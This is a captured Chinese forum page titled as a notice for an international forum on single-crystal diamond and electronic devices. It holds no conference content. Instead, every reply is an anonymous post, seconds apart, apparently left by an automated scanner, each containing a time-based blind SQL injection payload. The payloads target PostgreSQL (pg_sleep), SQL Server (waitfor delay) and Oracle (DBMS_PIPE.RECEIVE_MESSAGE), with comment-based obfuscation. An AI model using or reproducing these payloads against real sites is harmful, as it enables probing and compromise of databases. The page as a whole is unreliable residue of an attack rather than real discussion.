第4届单晶金刚石及电子器件国际论坛会议通知

楼主: admin
匿名  发表于 2022-10-22 05:10:20

1/**/and(select+1/**/from/**/pg_sleep(5))>0/**/

匿名  发表于 2022-10-22 05:10:23

1'/**/and(select'1'from/**/pg_sleep(0))::text>'0

匿名  发表于 2022-10-22 05:10:25

1'/**/and(select'1'from/**/pg_sleep(5))::text>'0

匿名  发表于 2022-10-22 05:10:27

1/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

匿名  发表于 2022-10-22 05:10:29

1/**/and(select+1)>0waitfor/**/delay'0:0:5'/**/

匿名  发表于 2022-10-22 05:10:32

1'and(select+1)>0waitfor/**/delay'0:0:0

匿名  发表于 2022-10-22 05:10:34

1'and(select+1)>0waitfor/**/delay'0:0:5

匿名  发表于 2022-10-22 05:10:36

1/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('t',0)

匿名  发表于 2022-10-22 05:10:38

1/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('f',5)

匿名  发表于 2022-10-22 05:10:41

1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u

高级模式